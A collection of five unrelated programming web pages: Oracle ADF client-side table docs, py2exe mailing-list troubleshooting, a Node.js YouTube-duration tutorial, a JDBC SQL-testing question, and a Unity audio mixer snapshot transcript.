Add any additional code needed to work with the component. Once you have the stamped component, you can interact with it as you would with any other component. For example, Example 10-26 shows how to use the stamped component to get the row-specific value of the name attribute (which was the stamped value as shown in Example 10-22) and then display the name in an alert. Example 10-27 shows the entire code for the JavaScript.
Example 10-27 JavaScript Used to Access Selected Row Value
function showSelectedName(event) {
  var firstRowKey;
  var addedRowKeys = event.getAddedSet();
  for (var rowKey in addedRowKeys) {
    firstRowKey = rowKey;
    break;
  }
  // We need the table to find our stamped component.
  // Fortunately, in the case of selection events, the
  // table is the event source.
  var table = event.getSource();
  // We use the table to find the name stamp component by id/row key:
  var nameStamp = table.findComponent("nameStamp", firstRowKey);
  if (nameStamp) {
    // This is the row-specific name
    var name = nameStamp.getValue();
    alert("The selected name is: " + name);
  }
}
Row keys are tokenized on the server, which means that the row key on the client may have no resemblance to the row key on the server. As such, only row keys that are served up by the client-side APIs (like AdfSelectionEvent.getAddedSet()) are valid. Also note that the AdfUITable.findComponent(id, rowKey) method may return null if the corresponding row has been scrolled off screen and is no longer available on the client. Always check for null return values from the AdfUITable.findComponent() method.
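The "extract the first row key" step above depends only on the fact that AdfSelectionEvent.getAddedSet() returns a plain JavaScript object with one property per selected row key. That step can therefore be sketched as a standalone helper and exercised outside the ADF client framework (the firstRowKeyOf name is our own, not an ADF API):

```javascript
// Return the first enumerable property name of a plain object
// (such as the added set of a selection event), or null if empty.
// In a real selection listener you would call:
//   var firstRowKey = firstRowKeyOf(event.getAddedSet());
function firstRowKeyOf(addedRowKeys) {
  for (var rowKey in addedRowKeys) {
    return rowKey; // single-selection components yield exactly one key
  }
  return null;
}
```

Returning null for an empty set mirrors the advice above: treat a missing key, like a null result from findComponent(), as a row that is not available on the client.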
http://docs.oracle.com/cd/E25054_01/web.1111/b31973/af_table.htm
I'm having a bizarre problem where a py2exe'd application crashes when starting, but so far the problem happens only on Windows 2000. It crashes consistently if I list the application as a Windows startup script (as in, if I list it in the registry under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run), but I can also occasionally get it to crash just from the command line (though this is pretty rare). This problem was reported to me by a user on a Windows 2000 box, and I was able to reproduce it on my own Windows 2000 box, but so far not on Windows 98 or Windows XP. I have never gotten the crash to happen when running from source, only after py2exe'ing it. When I heard about the problem, I began to narrow down the code to find out what was wrong, and in the end my script consisted of a single line:
import random
My py2exe script looks like this:
from distutils.core import setup
import py2exe, sys
sys.argv.append('py2exe')
setup(console=['CrashWin2k.py'])
I've started narrowing down the code in the random.py module, and have it down to this chunk:
from os import urandom as _urandom
#from binascii import hexlify as _hexlify
#NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0)
TWOPI = 2.0*_pi
LOG4 = _log(4.0)
SG_MAGICCONST = 1.0 + _log(4.5)
BPF = 53    # Number of bits in a float
print 'bad line'
RECIP_BPF = 2**-BPF
print 'all done'
If I run this on bootup, the 'all done' never gets printed, but 'bad line' does. So it appears that the 2**-BPF line causes the crash, although when I put this line in a module by itself (with the "BPF=53" line of course) and py2exe'd it, it worked fine. When it crashes, Windows generates a Dr. Watson log file with my app being the offending process and an "Exception number: c000001d (illegal instruction)" line. Anyway, I'm continuing to whittle down lines of code, but thought I'd ask if anyone has any insight at all into this, as it's pretty maddening to reboot each time I comment out a line.
:) I'm using Python 2.4.1 + py2exe 0.6.1 (although I also see my problem with py2exe-0.5.4). I'm also in the process of putting together a debug build, but I might be doing something wrong:
1) icon.rc was missing from the py2exe-0.6.1.zip file - does it get auto-generated or something? I pulled a copy out of CVS and that seemed to get me a little farther
2) py2exe tried to copy w9xpopen.exe (instead of w9xpopen_d.exe)
3) after the above two are fixed, I do get a finished build, but the application errors out before running any of my code and displays:
undefined symbol Py_InitModule4 -> exit(-1)
LoadLibrary(pythondll) failed
The system cannot find the file specified.
I'm still trying to figure that one out. Any hints, tips, and/or consolation would be appreciated. :) Thanks in advance! -Dave
Hi all,
I just downloaded py2exe-0.6.1 for Python24 (WinXP) and am trying to create single-file executables for an NT service. The resulting exe file that I get builds and installs just fine, however I receive the following error when trying to use the -remove command to uninstall the service:
C:\dev\WCMS\image_processing\MediaUnzipper\dist>MediaUnzipper -install
C:\dev\WCMS\image_processing\MediaUnzipper\dist>MediaUnzipper -remove
Traceback (most recent call last):
  File "boot_service.py", line 161, in ?
  File "win32serviceutil.pyo", line 263, in RemoveService
pywintypes.error: (2, 'UnloadPerfCounterTextStrings', 'The system cannot find the file specified.')
I do not receive this error when the executable is built as multiple files (ie 'bundle_files' option turned off). Any idea how I can fix this?
David, I haven't been able to get back to you on the solution that you gave me, but it worked. Well, you gave me two solutions - the one listed at worked like a charm. For some reason, I do not have the error message; I could not get the function to work. Py2exe spit out some error message that I no longer have in front of me.
Anyway, thank you very much for your assistance -- CHAD BEST
"David Bolen" <db3l@...> wrote in message news:uoe7frour.fsf@...
> Chad Best <slug57_98@...> writes:
> > I have created a script that will scan an image, resize it and adjust the
> > quality, then upload it to my webhost.
> Are you using PIL to handle your image processing? You've got to help
> py2exe out to know what image plugins to load since they are loaded
> dynamically by PIL and can't be auto-detected by py2exe.
> shows one way of manually importing the needed plugins. Or, I tend to
> use an approach of just adding the appropriate plugin modules to my
> "includes" option to py2exe in the setup.py module, thus avoiding any
> explicit import in my code itself.
> If you want to suck in all possible plugins automatically, you could
> have your setup script dynamically determine all available plugins and
> build up the "includes" option ... that's the way the "hook" in the
> Installer package does it - as in Installer 6a2:
> def install_Image(lis):
>     import Image
>     # PIL uses lazy initialization.
>     # you can decide if you want only the
>     # default stuff:
>     Image.preinit()
>     # or just everything:
>     Image.init()
>     import sys
>     for name in sys.modules:
>         if name[-11:] == "ImagePlugin":
>             lis.append(name)
> This appends the modules to the supplied list (which could be the
> includes option). It's slightly heavyweight since by importing Image
> it's actually loading the plugins, but it's sort of "set and forget."
> It's basically the same way that PIL itself auto-detects plugins
> (looking for modules whose name ends in ImagePlugin).
> Thinking of this reminds me how nice the "hook" approach in installer
> is (you can easily add functions that ran on imports of a specific
> module which could modify the list of modules that were "detected").
> The big benefit is that you could write a hook for a given module once
> and anyone else using that module got the benefit of the hook special
> processing. I wonder if anyone has experimented with modifying
> modulefinder (or having py2exe post-process its result) to support a
> similar approach?
>
> -- David
Thomas,
Thank you very much for implementing the bundling features in py2exe! While I still intend to distribute full directories for the main applications we have at work, the ability to create a singlefile exe for small utilities will be very useful when creating small tools and allowing other people to easily run them. I've created a small sample application, set bundle_files to 1, and everything seems to work perfectly on my machine. As I expected, if I copy the exe to a fresh install of WinXP, it fails in the usual way:
"This application has failed to start because MSVCR71.dll was not found. Re-installing the application may fix this problem."
And, if I copy MSVCR71.dll into the application directory, it works fine. But, wouldn't it be nice if I could include MSVCR71.dll as well? (since I've got a VS licence) So, just to test, I added a line to build_exe.py py2exe._run after the dlls are found:
dlls.add('msvcr71.dll')
The resulting exe is larger, and 'MSVCRT71.dll' appears in the file when I edit with a text editor, however the test application still fails on the bare WinXP install, so I expect that the MSVCR71.dll needs to be handled in a special way?
Take care,
-Brian
Michele Petrazzo <michele.petrazzo@...> writes:
> Yes, this has also been reported on c.l.p.
It works with wxPython versions up to 2.5.1.5, but crashes in newer versions. I'm looking into it. Thomas
https://sourceforge.net/p/py2exe/mailman/py2exe-users/?viewmonth=200509&viewday=6
How to Fetch a YouTube Video's Duration in Node.js August 6th, 2021 What You Will Learn in This Tutorial How to use the YouTube API to fetch a video's metadata and parse the duration string to get hours, minutes, and seconds separately. Table of Contents Getting Started For this tutorial, we're going to use the CheatCode Node.js Boilerplate to give us a starting point for our work. To start, let's clone a copy: Terminal git clone Next, install the dependencies: Terminal cd nodejs-server-boilerplate && npm install After those are installed, add the node-fetch dependency which we'll use to send requests to the YouTube API: Terminal npm i node-fetch With that installed, start up the development server: Terminal npm run dev Once running, we're ready to jump into the code. Wiring up an endpoint for fetching durations Before we jump into fetching durations, we're going to set up an HTTP endpoint using Express that we can use to call our fetch code. /api/index.js import graphql from "./graphql/server"; import getYoutubeVideoDuration from "../lib/getYoutubeVideoDuration"; export default (app) => { graphql(app); app.use("/youtube/duration/:videoId", async (req, res) => { const duration = await getYoutubeVideoDuration(req?.params?.videoId); res.set("Content-Type", "application/json"); res.send(JSON.stringify(duration, null, 2)); }); }; In the boilerplate we're using for this tutorial, an Express app is already initialized for us in /index.js at the root of the app. In that file, multiple functions are imported and passed the Express app instance. In this file, we have one of those functions defined that's responsible for defining our API-related routes. By default, the boilerplate supports a GraphQL API which has been imported here and called handing off the Express app instance. The point here is organization; nothing technical. 
All you need to understand at this point is that the app being passed in as the argument to the function we're defining here is the app instance returned when we call the express() function exported by express. The important part here is how we're using that app instance. To make fetching our video durations easier, we're defining a new route via the app.use() method exported by Express. Here, we expect the URL to return us an array of one or more objects detailing the duration for one or more videos. Here, :videoId will be replaced by one or more YouTube video IDs. In the callback of the function, we can see that we're calling a function that we'll define next, getYoutubeVideoDuration(), passing it the expected :videoId from our URL via req?.params?.videoId where the ? question marks are just a short-hand way of saying "if req exists and params exists on req, and videoId exists on req.params, return the videoId here." Again, videoId will be a string containing one or several YouTube video IDs (if more than one, we expect them to be comma-separated). When we call this function, we make a point to put an await keyword in front of it and make sure to add the async keyword to our route's callback function. This is required. If we omit the async keyword, we'll get an error when we run this code about await being a reserved keyword. Here, await is saying "when you get to this line of code, wait until the JavaScript Promise it returns is resolved, or, wait until this code completes before evaluating the lines after this one." Next, in order to respond to the request, we first set the Content-Type header to application/json using the res.set() method provided by Express and then finally, respond to the request with our found durations array via res.send(). Here, the JSON.stringify(duration, null, 2) part is just "prettifying" the string we return so it's spaced out in the browser and not mushed together (helpful for readability).
Now that we have our basic scaffolding set up, to make this work, let's take a look at the getYoutubeVideoDuration function we're importing up at the top of the file. Fetching a video's metadata from the YouTube API Two things to do. First, we need to make a request to YouTube's API to fetch the metadata for our video(s)—this will include the duration for the video—and second, we need to parse the duration from that metadata so that it's easier to use in our app (hypothetically speaking). Let's wire up the request to the API now and get back the metadata. To make our work a bit easier, we're outputting all of the code we'll need to communicate with the YouTube API here. To start, from this file, we export a function that takes in the anticipated youtubeVideoId string (we use a singular form here but this doesn't change that we can pass a string with a comma-separated list). Next, using the URL constructor function imported from the native Node.js url package—native meaning you don't need to install anything extra—we create a new url object, passing in the base URL for the YouTube API (specifically, v3 of the videos endpoint). With our url object (what we get back from new URL()), next, in order to pass data to YouTube, we need to use query params (as opposed to a POST body). To make passing those query params less error-prone, we use the URLSearchParams constructor function also imported from the Node.js url package. To it, we pass an object that we want to serialize (convert) into a query string like this ?key=someAPIKey&part=contentDetails&id=someVideoId. Here, we assign url.search to this where the search property is the name used by the url library to refer to the query params on the URL object (a technical artifact of the original intent of query params which is to aid in adding context to a search operation).
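A sketch of the request described above, with the assumptions flagged: it uses Node 18+'s global fetch, URL, and URLSearchParams rather than the node-fetch and url imports, the API key is a placeholder, and buildYoutubeUrl is a helper name of our own, not the tutorial's:

```javascript
// Sketch (not the tutorial's exact listing) of the request described above.
// Assumptions: Node 18+ globals (fetch, URL, URLSearchParams); the API key
// and the buildYoutubeUrl helper name are ours.
const buildYoutubeUrl = (youtubeVideoId, apiKey) => {
  // v3 of the YouTube API's videos endpoint.
  const url = new URL("https://www.googleapis.com/youtube/v3/videos");
  // Serialize the params into ?key=...&part=contentDetails&id=...
  url.search = new URLSearchParams({
    key: apiKey,
    part: "contentDetails",
    id: youtubeVideoId,
  }).toString();
  return url;
};

const getYoutubeVideoDuration = (youtubeVideoId, apiKey) => {
  return fetch(buildYoutubeUrl(youtubeVideoId, apiKey))
    .then(async (response) => {
      const data = await response.json();
      // Each item carries contentDetails.duration, e.g. "PT1H23M15S".
      return (data?.items || []).map((video) => ({
        id: video?.id,
        duration: video?.contentDetails?.duration,
      }));
    })
    .catch((error) => console.warn(error));
};

module.exports = { buildYoutubeUrl, getYoutubeVideoDuration };
```

The URL-building half is pure and easy to verify on its own; the fetch half only runs when you actually call it with a real key.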
Focusing in on what params we're passing, there are three we care about: key, which contains our YouTube API key (if you don't have one of these yet, learn how to generate one here—make sure to get the API key version, not the OAuth2 version); part, which describes which part of the available data returned by the YouTube API we want in return to our request; and id, which is the string of one or more YouTube video IDs we want to fetch data for. Of note, the key we're pulling in here is using the settings convention that's built-in to the boilerplate we're using. This gives us an environment-specific way to store configuration data safely in our app. The settings value being imported at the top is from the /lib/settings.js file which contains code that decides which settings file to load from the root of our app. It does this using the current value of process.env.NODE_ENV. For this tutorial, because we're in the development environment, we'll load up the settings-development.json file at the root of our app. If we were deploying to a production environment, we'd load up settings-production.json. Taking a quick look at that file, let's see where our YouTube API key needs to go: /settings-development.json { "authentication": { "token": "abcdefghijklmnopqrstuvwxyz1234567890" }, ... "youtube": { "apiKey": "Your key goes here..." } } Alphabetically, we add a property youtube to the main settings object with a nested apiKey property with its value set to the API key we retrieved from YouTube. Back in our code when we call to settings?.youtube?.apiKey, this is the value we're referencing. With all of our config out of the way, we're ready to fetch our video metadata from YouTube.
Using the fetch function we're importing up top from the node-fetch package we installed earlier (this is just a Node-friendly implementation of the browser fetch() method), we pass in our url object, appending a .then() and .catch() callback on the end, meaning we anticipate that our call to fetch() will return a JavaScript Promise. In the .catch() callback, if something goes wrong, we just log out the error to our server console with console.warn() (you may want to hand this off to your logging tool, if applicable). The part we care about here, the .then() callback, is where all of the action happens. First, we take the response argument we expect to be passed to the .then() callback, calling its .json() method and using the await keyword—remembering to add the async keyword to the callback function to avoid a syntax error. Here, response.json() is a function that fetch() provides us which allows us to convert the HTTP response object we get back into a format of our choice (within the limitations of the API we're calling to). In this case, we expect the data YouTube sends back to us to be in a JSON format, so we use the .json() method here to convert the raw response into JSON data. With that data object, next, we expect YouTube to have added an items property on that object which contains an array of one or more objects describing the video IDs we passed via the id query param in our url. Now for the fun part. With our list of videos (one or more), we want to format that data into something that's more usable in our application. By default, YouTube formats the duration timestamp stored under the video's contentDetails object as a string that looks something like PT1H23M15S which describes a video with a video duration of 1 hour, 23 minutes, and 15 seconds. As-is, this string isn't very helpful, so we want to convert it into something we can actually use in our code. 
To do it, in the next section, we're going to rig up that getDuration() method we're calling here. Before we do, so it's clear, once we've retrieved this formatted duration value, because we're returning our call to videos.map() back to our .then() callback and also returning our call to fetch() from our function, we expect the mapped videos array to be the value returned from the function we're exporting from this file (what ultimately gets handed back to our res.send() in /api/index.js). Parsing the duration string returned by the YouTube API Let's isolate that getDuration() function we spec'd out at the top of our file and walk through how it works. /lib/getYoutubeVideoDuration.js const getDuration = (durationString = "") => { const duration = { hours: 0, minutes: 0, seconds: 0 }; const durationParts = durationString .replace("PT", "") .replace("H", ":") .replace("M", ":") .replace("S", "") .split(":"); if (durationParts.length === 3) { duration["hours"] = durationParts[0]; duration["minutes"] = durationParts[1]; duration["seconds"] = durationParts[2]; } if (durationParts.length === 2) { duration["minutes"] = durationParts[0]; duration["seconds"] = durationParts[1]; } if (durationParts.length === 1) { duration["seconds"] = durationParts[0]; } return { ...duration, string: `${duration.hours}h${duration.minutes}m${duration.seconds}s`, }; }; Our goal here is to get back an object with four properties: - hours, describing how many hours (0 or more) the video plays for. - minutes, describing how many minutes (0 or more) the video plays for. - seconds, describing how many seconds the video plays for. - A string concatenating together the above three values that we can—hypothetically—display in the UI of our app. To get there, first, we initialize an object called duration which will contain the hours, minutes, and seconds for our video. Here, we set those properties on the object and default them to 0. Next, remember that our duration string looks something like: PT1H23M15S.
It can also look like PT23M15S or PT15S if it's less than an hour in length or less than a minute in length. To handle these different cases, here, we take the durationString we've passed in and first remove the PT part using .replace() and then swap the H and M parts with a : symbol, and finally, remove the S value. At the end of this chain, we call a .split() on the : character that we just added into the string to split our hours, minutes, and seconds, into an array. So it's clear, the transformation flows like this: // 1 PT1H23M15S // 2 1H23M15S // 3 1:23:15S // 4 1:23:15 // 5 ['1', '23', '15'] With these durationParts we can start to move towards an easier to work with duration value. More specifically, the work we need to do is decide what the hours, minutes, and seconds properties on our duration object that we defined at the top of our function need to be set to (if at all). The trick we're using here is to test the length of the durationParts array. If it contains 3 items, we know that it has hours, minutes, and seconds. If it contains 2 items, we know that it has minutes and seconds. And if it has 1 item, we know that it has seconds. For each of these cases, we add an if statement, inside which we overwrite the appropriate values on our duration object corresponding to the appropriate duration part in the durationParts array. So, here, if we have 3 items, we set the duration.hours to the first item in the array, duration.minutes to the second item in the array, and duration.seconds to the third item in the array (in case the 0, 1, 2 here is confusing, remember that JavaScript arrays are zero-based meaning the first item in the array is in position zero). We repeat this pattern for the other two cases, only overwriting the values that we expect to be greater than zero (minutes and seconds for the 2 item array and just seconds for the 1 item array). 
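Running the parser against the three shapes of duration string makes the branching concrete. One detail worth noting: because the parts come out of String.split, the overwritten hours/minutes/seconds values are strings, while the untouched defaults stay the number 0.

```javascript
// The getDuration parser from /lib/getYoutubeVideoDuration.js, exercised
// against the three duration shapes discussed above.
const getDuration = (durationString = "") => {
  const duration = { hours: 0, minutes: 0, seconds: 0 };

  const durationParts = durationString
    .replace("PT", "")
    .replace("H", ":")
    .replace("M", ":")
    .replace("S", "")
    .split(":");

  if (durationParts.length === 3) {
    duration["hours"] = durationParts[0];
    duration["minutes"] = durationParts[1];
    duration["seconds"] = durationParts[2];
  }
  if (durationParts.length === 2) {
    duration["minutes"] = durationParts[0];
    duration["seconds"] = durationParts[1];
  }
  if (durationParts.length === 1) {
    duration["seconds"] = durationParts[0];
  }

  return {
    ...duration,
    string: `${duration.hours}h${duration.minutes}m${duration.seconds}s`,
  };
};

console.log(getDuration("PT1H23M15S").string); // 1h23m15s
console.log(getDuration("PT23M15S").string); // 0h23m15s
console.log(getDuration("PT15S").string); // 0h0m15s

module.exports = { getDuration };
```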
With our duration object built, finally, at the bottom of our getDuration() function we return an object, using the JavaScript ... spread operator to "unpack" our duration object properties onto that new object and add an additional string property that concatenates our duration object's values together in a string. That's it! Now, we're ready to take this thing for a spin. Testing out fetching a duration To test this out, let's load up our HTTP endpoint we defined at the beginning of the tutorial in the browser and pass it some YouTube video IDs: Awesome! Try it out with any YouTube video ID to get the duration object back. Wrapping Up In this tutorial, we learned how to wire up an HTTP endpoint in Express to help us call to a function that sends a GET request for a YouTube video's metadata via the YouTube API. We learned how to use node-fetch to help us perform the request as well as how to write a function to help us parse the YouTube duration string we got back from the API.
https://cheatcode.co/tutorials/how-to-fetch-a-youtube-videos-duration-in-node-js
I have a test suite of end-to-end tests. They are supposed to catch typos in SQL statements, bad table or column names (anything where DB schema and Java code disagree), or missing DB permissions. I don't want to rely on data in the database (too complicated to set up); this is just a basic test. import java.sql.*; import org.junit.Test; public class TypoTest { private Connection getConnection() throws Exception { String connectionString = "jdbc:postgresql://127.0.0.1:5432/db"; String driverClassName = "org.postgresql.ds.PGConnectionPoolDataSource"; Class.forName(driverClassName).newInstance(); return DriverManager.getConnection(connectionString, "robert", ""); } @Test public void runQuery() throws Exception { try (Connection connection = getConnection(); PreparedStatement ps = connection.prepareStatement("SELECT relname FROM pg_catalog.pg_class"); ResultSet data = ps.executeQuery()) { while (data.next()) { data.getString("relname"); } } } } When I run the above test, it fails if I have a typo in the SELECT statement. (Good.) If I have a typo in the column name in data.getString("typo here"), that won't get caught if the table queried does not have data because then the loop is never entered. To keep the test (setup) simple, I don't want to insert data into my tables first. I guess I could make the column names into constants and DRY up my code and get rid of the problem. However, I am wondering if there is an easier way... I am lazy and don't want to edit all my queries. Is there a better way to unit-test my SQL? I am using Postgres 9.5 and JDBC 4. I guess you already have the answer you seek but just for the sake of answering, you can try using result-set-metadata by using a select * from table and then checking the column names against your query (you'd have to parse the query string I guess...). I believe it will work for empty tables as well but do note that I have not tested the empty table scenario.
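One way to flesh out the answer's suggestion: PreparedStatement.getMetaData() returns the statement's ResultSetMetaData without any rows having to exist, so the column names it reports can be checked against the names your code reads. The sketch below stubs the metadata names as a plain set so the comparison logic is runnable on its own; in a real test they would come from md.getColumnName(i). The class and method names here are hypothetical, not from the question.

```java
import java.util.HashSet;
import java.util.Set;

// Sketch of the metadata comparison suggested in the answer. In the real
// test, "actualColumns" would be filled from the statement's metadata,
// which is available even when the table is empty:
//   ResultSetMetaData md = ps.getMetaData();
//   for (int i = 1; i <= md.getColumnCount(); i++)
//       actualColumns.add(md.getColumnName(i));
public class ColumnCheck {
    static Set<String> missingColumns(Set<String> actualColumns,
                                      String... referencedColumns) {
        Set<String> missing = new HashSet<>();
        for (String name : referencedColumns) {
            if (!actualColumns.contains(name)) {
                missing.add(name);
            }
        }
        return missing;
    }

    public static void main(String[] args) {
        Set<String> actual = new HashSet<>();
        actual.add("relname"); // as reported by the metadata
        // "typo_here" mimics a bad data.getString("...") column name.
        System.out.println(missingColumns(actual, "relname", "typo_here"));
    }
}
```

Failing the test whenever missingColumns() is non-empty catches the empty-table case that the while loop in the question silently skips.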
http://www.devsplanet.com/question/35275921
Audio Mixer Snapshots Reviewed with version: 5 - Difficulty: Beginner In Unity it's possible to store and recall the state of an AudioMixer including volumes and effect settings using Snapshots. Snapshots can be recalled via script using the TransitionTo or the TransitionToSnapshots functions. Transcript - 00:00 - 00:03 In Unity it's possible to save and recall - 00:03 - 00:05 the state of an audio mixer asset - 00:05 - 00:07 using snapshots. - 00:08 - 00:12 In this audio mixer master mixer - 00:12 - 00:15 we have two snapshots created. - 00:15 - 00:18 In this case Unpaused and Paused. - 00:19 - 00:22 In Unpaused we've set our levels - 00:22 - 00:25 and we've also set the cutoff frequency - 00:25 - 00:27 of a low pass filter, - 00:27 - 00:30 in this case to 22000hz. - 00:31 - 00:34 When we click on the Paused snapshot - 00:35 - 00:37 we'll see that a new cutoff frequency - 00:37 - 00:41 has been recalled, 365hz. - 00:41 - 00:43 In this case it's attenuating the high - 00:43 - 00:45 frequencies of our music track, - 00:45 - 00:48 which is running through the music group of master mixer. - 00:48 - 00:50 When the Escape key is pressed - 00:50 - 00:53 the music track will be low pass filtered. - 00:53 - 00:55 Let's check that out. - 00:57 - 00:59 When we press escape our music track - 00:59 - 01:01 is low pass filtered and when we press again. - 01:05 - 01:07 To create a new snapshot we can click - 01:07 - 01:09 the + button in the snapshots area. - 01:09 - 01:12 Now we have a copy of Unpaused - 01:13 - 01:15 and we can set our values, and now - 01:17 - 01:20 we can recall those values in the editor - 01:20 - 01:22 by clicking on the snapshot names. - 01:22 - 01:27 At runtime we can recall snapshot values - 01:27 - 01:30 using the TransitionTo function.
- 01:30 - 01:33 TransitionTo takes a float in seconds - 01:34 - 01:36 and allows us to interpolate - 01:36 - 01:39 between one snapshot and another. - 01:39 - 01:42 TransitionTo is called - 01:42 - 01:45 from the audio mixer snapshot - 01:45 - 01:47 that we're transitioning to. - 01:47 - 01:50 In this project we've got a game object - 01:50 - 01:52 called Menu Canvas. - 01:52 - 01:54 Menu Canvas has a script - 01:55 - 01:57 called Pause Manager. - 01:57 - 01:59 Let's take a look at Pause Manager in mono develop. - 01:59 - 02:01 In Pause Manager we've added the - 02:01 - 02:06 namespace declarations using UnityEngine.UI - 02:06 - 02:08 and using UnityEngine.Audio. - 02:08 - 02:10 We are also checking to see if - 02:10 - 02:13 we're currently using the Unity editor - 02:13 - 02:15 and if so we'll include the - 02:15 - 02:17 Unity editor namespace. - 02:19 - 02:21 Inside our class we're declared two public - 02:21 - 02:24 variables of the audio mixer snapshot type - 02:24 - 02:27 called Paused and Unpaused. - 02:27 - 02:30 We've also declared a variable of the type canvas - 02:30 - 02:32 called Canvas. - 02:32 - 02:34 In our start function we're getting a reference - 02:34 - 02:37 to our canvas component using GetComponent. - 02:39 - 02:42 In update we're checking to see if the escape - 02:42 - 02:44 key has been pressed. - 02:44 - 02:46 If it has we'll flick the enabled - 02:46 - 02:47 state of canvas - 02:48 - 02:51 to Enabled if it's disabled - 02:51 - 02:53 or Disabled if it's enabled. - 02:53 - 02:56 We'll also call the Pause function. - 02:56 - 02:58 In Pause we're going to check - 02:58 - 03:00 to see if time.timeScale - 03:00 - 03:02 is equal to 0. - 03:02 - 03:05 And if it's not we're going to set it to 0. - 03:06 - 03:08 If it is we'll set it to 1. - 03:09 - 03:12 Next we're going to call the low pass function. 
- 03:14 - 03:16 The low pass function also checks to see if - 03:16 - 03:19 time.timeScale is equal to 0 - 03:19 - 03:23 and if it is it will call the TransitionTo function - 03:23 - 03:25 from the Paused snapshot. - 03:25 - 03:27 We're going to parse in the floating point parameter - 03:27 - 03:29 time to reach, which in this case - 03:29 - 03:31 is 0.01 seconds. - 03:31 - 03:35 If time.timeScale is not equal to 0 - 03:35 - 03:37 we're going to call TransitionTo - 03:37 - 03:40 from the Unpaused snapshot, - 03:40 - 03:42 also parsing in that same - 03:42 - 03:45 0.01 second parameter - 03:45 - 03:47 for the time to make the transition - 03:47 - 03:50 We have a public function called Quit which is going to check - 03:50 - 03:53 if we're using the Unity editor - 03:53 - 03:55 and if we are it's going to set - 03:55 - 03:58 EditorApplication.isPlaying to false, - 03:58 - 04:01 meaning it's going to stop playing our scene. - 04:01 - 04:04 If we're not using the editor, meaning this is a - 04:04 - 04:06 build of our game we're going to call - 04:06 - 04:08 application.Quit, meaning we're going to - 04:08 - 04:11 quit the application out to the desktop. - 04:15 - 04:18 In the Unity editor we've assigned the Paused and - 04:18 - 04:20 the Unpaused snapshots - 04:20 - 04:23 to the audio mixer snapshots that we created - 04:23 - 04:26 in master mixer here. - 04:26 - 04:28 If we want to change these we can do so - 04:28 - 04:30 using the asset picker. - 04:31 - 04:34 When transitioning between snapshots - 04:34 - 04:37 the default interpolation curve is linear. - 04:38 - 04:41 We can change that by selecting a parameter, - 04:41 - 04:44 right clicking on it and choosing one of these - 04:44 - 04:46 override transition types. - 04:46 - 04:49 The smooth step snapshot transition type - 04:50 - 04:53 will give us an S shaped transition curve. - 04:53 - 04:57 Squared will give us a parabolic curve. - 04:57 - 05:00 Square root will give us a square root curve. 
- 05:01 - 05:04 Brick wall start will immediately transition - 05:04 - 05:06 to the stored value being transitioned - 05:06 - 05:09 to at the beginning of the transition. - 05:10 - 05:12 Brick wall end will wait until the - 05:12 - 05:15 transition time has elapsed and then - 05:15 - 05:18 make a hard transition to the stored value. - 05:19 - 05:22 In addition to using TransitionTo - 05:22 - 05:24 it's also possible to transition - 05:24 - 05:27 to an interpolated blend - 05:27 - 05:30 of multiple snapshots using the transition - 05:30 - 05:32 to snapshots function. - 05:32 - 05:36 Transition to snapshots function takes 3 parameters. - 05:36 - 05:41 The first, an array of audio mixer snapshots - 05:41 - 05:44 allows us to choose which snapshots - 05:44 - 05:46 we want to create a blend between. - 05:46 - 05:49 Second parameter is an array of floats. - 05:49 - 05:51 It allows us to specify the weighting - 05:51 - 05:55 of each element in the resulting blend. - 05:55 - 05:57 The third parameter is a float - 05:57 - 06:00 in seconds which allows us to specify - 06:00 - 06:04 the time to reach the new desired blend. - 06:04 - 06:06 Transition to snapshots is called - 06:06 - 06:08 from the audio mixer that contains the snapshot - 06:08 - 06:10 that we're transitioning between. - 06:11 - 06:15 What we've got here is we've setup 3 cube triggers. - 06:16 - 06:18 When our player collides with each one of these - 06:18 - 06:21 we will transition to a blend - 06:21 - 06:23 of 2 snapshots. - 06:24 - 06:27 Each of the snapshots has been setup - 06:27 - 06:30 in our sound effects sub mixer. - 06:31 - 06:34 The sound effects sub mixer is running in to the sound effects - 06:34 - 06:37 group of our master mixer. - 06:37 - 06:39 I've turned down the music for this example. - 06:41 - 06:44 In the sound effects mixer, on the gun shots group - 06:44 - 06:46 we've added a send effect. 
- 06:47 - 06:49 This is under Add Send - 06:49 - 06:51 and what this will do is send a copy of the - 06:51 - 06:54 signal from gun shots to the receive effect - 06:54 - 06:56 that we've added to reverb return. - 06:56 - 06:58 The receive effect will pass it's signal to our - 06:58 - 07:01 SFX reverb effect which will cause our gunshots - 07:01 - 07:04 to sound like they're happening in a reverberant space. - 07:05 - 07:07 We've setup two snapshots. - 07:08 - 07:12 One with no reverb in which the send level - 07:12 - 07:14 for our gun shots send effect - 07:14 - 07:16 is turned all the way down. - 07:16 - 07:18 The next is heavy reverb - 07:18 - 07:20 where it's turned all the way up, - 07:21 - 07:23 and we can just listen to how those sound. - 07:25 - 07:27 Edit In Play Mode. - 07:29 - 07:30 Click, we can hear no reverb. - 07:31 - 07:33 Select heavy reverb. - 07:35 - 07:38 I've intentionally put a very strong unrealistic - 07:38 - 07:41 reverb on there so that we can hear the effect clearly. - 07:41 - 07:43 Now we've created these three - 07:43 - 07:48 transparent cubes called reverb trigger 1, 2 and 3. - 07:49 - 07:51 Each of them has a copy of the script reverb - 07:51 - 07:52 trigger on it. - 07:52 - 07:54 Reverb trigger is a simple script - 07:54 - 07:56 which contains a public variable for our - 07:56 - 07:59 reverb control script, and a public - 07:59 - 08:01 integer called trigger number. - 08:03 - 08:05 When the player collides with the trigger - 08:05 - 08:07 that this is attached to it's going to call - 08:07 - 08:10 the blend snapshot function of - 08:10 - 08:14 reverb control, which takes an integer trigger number. - 08:15 - 08:18 In Unity we've assigned the reverb - 08:18 - 08:21 control variable by dragging and dropping - 08:21 - 08:23 our audio mixer control object, - 08:24 - 08:26 which has that script attached to it. - 08:26 - 08:29 We've also assigned unique trigger numbers - 08:29 - 08:31 to each of these trigger objects. 
